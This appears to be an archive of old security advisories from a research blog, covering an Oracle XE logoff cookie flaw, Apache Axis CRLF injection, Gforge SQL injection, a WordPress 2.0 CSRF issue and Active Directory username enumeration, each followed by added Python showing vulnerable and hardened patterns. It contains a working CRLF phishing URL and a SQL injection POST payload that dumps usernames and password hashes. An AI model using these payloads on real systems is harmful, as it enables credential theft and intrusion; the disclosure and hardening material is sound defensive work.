Oracle 10g Express Edition Cookie Issue

April 20, 2008 Advisories, Research | Comments (0) sid @ 10:08 am

Oracle 10g Express Edition does not invalidate the cookie www_flow_user2 on server when the user logs off.

Tested in version:- Oracle 10g Express Edition 10.2.0.1.0; other versions may also be vulnerable.

Patch:- Oracle CPU April 2008
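The defect above is a logoff that only tells the browser to drop the cookie while the server keeps honouring it. The following is an added example (not Oracle's code) of a hypothetical in-memory session store that shows the weak pattern beside the correct one: revoking the session record on the server so a replayed cookie value is refused. The cookie name is taken from the advisory; the TTL and store layout are assumptions.

```python
"""Server-side session invalidation on logoff (added example, hypothetical store)."""
import hmac
import secrets
import time

SESSION_TTL = 15 * 60  # idle lifetime in seconds; constructed value for the example


class SessionStore:
    """Maps session tokens (the cookie value) to the user who owns them."""

    def __init__(self):
        self._sessions = {}  # token -> {"user": str, "expires": float}

    def login(self, user, now=None):
        """Create a fresh, unguessable session token for `user`."""
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)
        self._sessions[token] = {"user": user, "expires": now + SESSION_TTL}
        return token

    def lookup(self, token, now=None):
        """Return the user for a live token, or None if unknown/expired."""
        now = time.time() if now is None else now
        # Compare in constant time so lookups do not leak token prefixes.
        for stored, rec in self._sessions.items():
            if hmac.compare_digest(stored, token):
                if rec["expires"] < now:
                    del self._sessions[stored]
                    return None
                rec["expires"] = now + SESSION_TTL  # sliding expiry
                return rec["user"]
        return None

    def logoff_client_only(self, token):
        """Weak pattern: the browser is told to drop the cookie, but the
        server-side record survives, so anyone holding the old value
        still has a valid session."""
        return "Set-Cookie: www_flow_user2=; Max-Age=0"

    def logoff(self, token):
        """Hardened: revoke the server-side record first, then clear the cookie."""
        self._sessions.pop(token, None)
        return "Set-Cookie: www_flow_user2=; Max-Age=0"
```

The check to run against any web application is the one the test encodes: capture the cookie value before logoff, log off, then present the old value again; a correct implementation rejects it.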

Apache Axis CRLF And Content Injection

November 1, 2007 Advisories, Research | Comments (0) sid @ 7:53 pm

Version tested:- 1.4

Vendor's website:- http://ws.apache.org/axis/

Details:- The vulnerability reported earlier this year was later addressed by the Apache Axis group, and the error messages in version 1.4 no longer leak the document root or any directory structure. However, the error message returned for a non-existing WSDL is vulnerable to CRLF injection: although it HTML-encodes all user input, thereby denying any XSS or HTML injection, content injection is still possible (a minor issue).

Exploit:- http://victim/axis/tt_pm4l%0d%0a%0d%0a%0d%0a%0d%0a———————%0d%0aAn%20Error%20has%20Occured%0d%0a%0d%0aplease%20send%20your%20credentials%20and%20problem%20encountered%20to%20%0d%0ablah@blah.com%0d%0a————–%0d%0a%0d%0a%0d%0a.jws?wsdl

Output:-

AXIS error

Sorry, something seems to have gone wrong… here are the details:

Fault - ; nested exception is:

java.io.FileNotFoundException: /tt_pm4l

———————

 An Error has Occured

please send your credentials and problem encountered to

blah@blah.com

————–

.jws

 AxisFault

..
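The root cause is that the decoded path is copied into the error body with only HTML encoding, so percent-encoded CR/LF survive and attacker text appears as its own lines. The following is an added example (not Apache Axis code) that shows a naive renderer beside a hardened one that strips control characters before encoding, plus a small detection hook for flagging such requests in logs. The error text is modelled on the output above; the function names are assumptions.

```python
"""CRLF-safe error rendering for a not-found resource (added example)."""
import html
import re
from urllib.parse import unquote

# Control characters (NUL..US and DEL) must never reach a response body
# or a log line unchanged. Constructed pattern for this example.
_CTRL = re.compile(r"[\x00-\x1f\x7f]")

_HEADER = ("AXIS error\n"
           "Sorry, something seems to have gone wrong... here are the details:\n"
           "java.io.FileNotFoundException: ")


def decode_request_path(raw_path):
    """Percent-decode the path the way the servlet container would."""
    return unquote(raw_path)


def has_crlf(path):
    """Detection hook: True when a decoded path carries CR or LF, which a
    legitimate resource name never needs; log or alert on these."""
    return "\r" in path or "\n" in path


def render_error_naive(requested_path):
    """HTML-encodes only: line breaks survive, so injected text renders as
    separate lines of the error page."""
    return _HEADER + html.escape(requested_path)


def render_error(requested_path):
    """Hardened: remove control characters, then HTML-encode. The result
    is always exactly three lines regardless of the input."""
    cleaned = _CTRL.sub("", requested_path)
    return _HEADER + html.escape(cleaned)
```

The test feeds a constructed path modelled on the advisory and checks that the hardened renderer keeps the line count fixed while the naive one does not.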
 

Gforge SQL Injection

September 13, 2007 Advisories, Research | Comments (0) admin @ 3:03 pm

Original Advisory: http://www.portcullis-security.com/179.php

The file /www/people/editprofile.php seems to be vulnerable to SQL injection at multiple points.

The exploit is fairly easy: one POST request returns all the usernames and hashes from the backend database.

The hashes can then be cracked using John the Ripper.

Exploit:-

POST request to: /www/people/editprofile.php

skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+from+users–%3d1&MultiDelete=Delete

Works against a PostgreSQL database :).

Refer to the paper for exploiting SQL injections against PostgreSQL databases.
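The injection works because the skill_delete[] values are pasted into an IN (...) list as text. The following is an added example (not Gforge code) showing that pattern beside the fix a maintainer would apply: reject any value that is not a plain integer, then bind the surviving ids as query parameters. It uses an in-memory SQLite database with a constructed schema named after the tables in the advisory; column and table layout are assumptions, not Gforge's real schema.

```python
"""Parameterised handling of a list of ids from a form field (added example)."""
import sqlite3


def make_db():
    """Constructed sample data mirroring the tables named in the advisory."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (user_name TEXT, unix_pw TEXT);
        INSERT INTO users VALUES ('alice', '$1$hashA'), ('bob', '$1$hashB');
        CREATE TABLE skills_data (skills_data_id INTEGER, user_id INTEGER, title TEXT);
        INSERT INTO skills_data VALUES (484, 7, 'python'), (485, 7, 'c'), (486, 8, 'perl');
    """)
    return conn


def list_skills_unsafe(conn, user_id, raw_values):
    """The vulnerable shape: form values joined straight into the SQL text."""
    sql = ("SELECT title FROM skills_data WHERE user_id=%d AND skills_data_id IN (%s)"
           % (user_id, ",".join(raw_values)))
    return [row[0] for row in conn.execute(sql)]


def parse_ids(raw_values):
    """Accept only plain decimal integers; anything else is rejected outright."""
    ids = []
    for value in raw_values:
        if not value.isdigit():
            raise ValueError("skill_delete[] must contain integers, got %r" % value)
        ids.append(int(value))
    return ids


def _in_clause(n):
    return ",".join("?" for _ in range(n))


def list_skills(conn, user_id, raw_values):
    """Hardened read: validated ids are bound as parameters, never interpolated."""
    ids = parse_ids(raw_values)
    if not ids:
        return []
    sql = "SELECT title FROM skills_data WHERE user_id=? AND skills_data_id IN (%s)" % _in_clause(len(ids))
    return [row[0] for row in conn.execute(sql, [user_id, *ids])]


def delete_skills(conn, user_id, raw_values):
    """Hardened delete, scoped to the calling user's own rows. Returns rows removed."""
    ids = parse_ids(raw_values)
    if not ids:
        return 0
    sql = "DELETE FROM skills_data WHERE user_id=? AND skills_data_id IN (%s)" % _in_clause(len(ids))
    cur = conn.execute(sql, [user_id, *ids])
    conn.commit()
    return cur.rowcount
```

Note that validation alone (integers only) would already block the payload; parameter binding is kept as well so the query stays safe if the validation is ever loosened.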

Undisclosed Wordpress 2.0 Security Issues

June 5, 2007 Advisories, Research | Comments (0) admin @ 2:21 pm

I recently came across this security advisory and decided to find out what the undisclosed issues could be. I downloaded WordPress 2.0 to find these undisclosed issues. Why I am interested in WordPress 2.0 is a different story though. :)
It was trivial to figure out that this version has no protection against CSRF attacks. The file wp-admin/options-reading.php has a parameter posts_per_rss that seems to have been left unsanitized. It is possible to make an admin submit (via CSRF) a malicious value of this parameter, which will eventually result in a database error. However, the injection seems really difficult to exploit.

Example:- http://192.168.1.183:80/apache2-default/wordpress/?feed=rss2

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1]
SELECT DISTINCT * FROM wp_posts WHERE 1=1 AND post_date_gmt <= '2007-01-08 04:12:59' AND (post_status = "publish") AND post_status != "attachment" GROUP BY wp_posts.ID ORDER BY post_date DESC LIMIT 0, 10'

As the injection point is after LIMIT and because of the ORDER BY clause, I think it is not exploitable.
If you think it is indeed exploitable drop me an email now…
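Two independent defences would have closed the issue described above: a per-session, per-action token on the options form so a forged cross-site POST is refused, and type coercion of posts_per_rss to a bounded integer before it is stored, so the value reaching the LIMIT clause can never carry a quote. The following is an added example (not WordPress code) of both; the nonce construction, the bounds and the handler name are assumptions.

```python
"""CSRF nonce check plus integer coercion for an options form (added example)."""
import hashlib
import hmac
import secrets

# Per-deployment secret; generated here only so the example runs stand-alone.
SECRET = secrets.token_bytes(32)


def make_nonce(session_id, action):
    """Token bound to the session and the specific action it authorises."""
    msg = ("%s:%s" % (session_id, action)).encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()[:16]


def verify_nonce(session_id, action, submitted):
    """Constant-time comparison; a missing token verifies as invalid."""
    return hmac.compare_digest(make_nonce(session_id, action), submitted or "")


def coerce_posts_per_rss(raw, default=10, lo=1, hi=100):
    """Store the setting as a bounded integer regardless of what was submitted."""
    try:
        value = int(str(raw).strip())
    except (TypeError, ValueError):
        return default
    return min(max(value, lo), hi)


def update_reading_options(session_id, form):
    """Handler for the options form: refuse requests lacking a valid nonce,
    then sanitise the value before it is persisted."""
    if not verify_nonce(session_id, "update-options", form.get("_wpnonce")):
        return {"ok": False, "error": "invalid nonce"}
    return {"ok": True, "posts_per_rss": coerce_posts_per_rss(form.get("posts_per_rss"))}


def feed_limit_clause(posts_per_rss):
    """The stored integer reaches the feed query as a bound parameter."""
    return ("LIMIT ?, ?", (0, coerce_posts_per_rss(posts_per_rss)))
```

With coercion in place, the database error quoted above cannot occur because the text `10'` is never forwarded; the stray quote is dropped and the default applies.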

Logon Time Restrictions in a Domain in Windows Server 2003 Allow Username Enumeration

May 27, 2007 Advisories, Research | Comments (0) sid @ 9:29 am

Windows Server 2003 can be configured to restrict the hours and days that a user may log on to a Windows Server 2003 domain. This could lead to username enumeration.

Issue:- Microsoft Windows Active Directory Username Enumeration

Criticality:- Less Critical

Impact:- Exposure of system information

Description:- It has been identified that Microsoft Windows Active Directory contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when the Windows Domain Controller returns different error messages depending on whether a valid username was supplied via Windows Terminal Services. This only happens for user accounts that have time restrictions set, and only when these accounts are accessed during the restricted time. This can be exploited to help enumerate valid usernames, resulting in a loss of confidentiality.

Vendor's response:-
“We will NOT be issuing a security update for this issue.
It is likely that in a next version or service pack of the product we may consider making changes, but not before then”.

Screenshots:
1. Error returned When Account is Accessed at Restricted time
2. Error returned When Account is Accessed at Permitted time
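The enumeration above is possible because the failure reason (unknown user, wrong password, outside permitted hours) shows through in the message the client receives. The following is an added example (not Microsoft code) of a toy logon check that shows the distinguishable-message shape beside a uniform one that returns a single generic message for every failure and records the real reason only in a server-side audit log. The directory, the logon-hours representation and the message text are constructed assumptions.

```python
"""Uniform logon failure messages versus reason-revealing ones (added example)."""
import hmac
from dataclasses import dataclass
from datetime import datetime
from typing import Optional, Set, Tuple

# One message for every failure, so the client cannot tell the cases apart.
GENERIC = ("The user name or password is incorrect, "
           "or the account is not permitted to log on at this time.")


@dataclass
class Account:
    name: str
    password: str
    # Permitted (weekday, hour) pairs; None means no time restriction.
    logon_hours: Optional[Set[Tuple[int, int]]] = None


def allowed_now(acct, now):
    return acct.logon_hours is None or (now.weekday(), now.hour) in acct.logon_hours


def _password_ok(acct, password):
    return hmac.compare_digest(acct.password.encode(), password.encode())


def logon_verbose(directory, username, password, now):
    """Reason-revealing shape: each branch has its own message, and the
    time-restriction check runs before the password is even looked at."""
    acct = directory.get(username.lower())
    if acct is None:
        return (False, "The specified user name does not exist.")
    if not allowed_now(acct, now):
        return (False, "Your account has time restrictions that prevent you from logging on now.")
    if not _password_ok(acct, password):
        return (False, "The password is incorrect.")
    return (True, "ok")


def logon_uniform(directory, username, password, now, audit_log):
    """Hardened shape: every failure path yields GENERIC; the precise reason
    goes to the audit log, which defenders can watch for enumeration patterns."""
    acct = directory.get(username.lower())
    if acct is None:
        reason = "unknown user"
    elif not _password_ok(acct, password):
        reason = "wrong password"
    elif not allowed_now(acct, now):
        reason = "outside permitted logon hours"
    else:
        audit_log.append((username, "success"))
        return (True, "ok")
    audit_log.append((username, reason))
    return (False, GENERIC)


def accounts_with_logon_hours(directory):
    """Inventory helper: which accounts carry a time restriction at all."""
    return sorted(a.name for a in directory.values() if a.logon_hours is not None)
```

The test uses a Sunday timestamp against an account limited to weekday office hours, the situation the screenshots above illustrate, and checks that the uniform variant returns identical text for an unknown user and a restricted one.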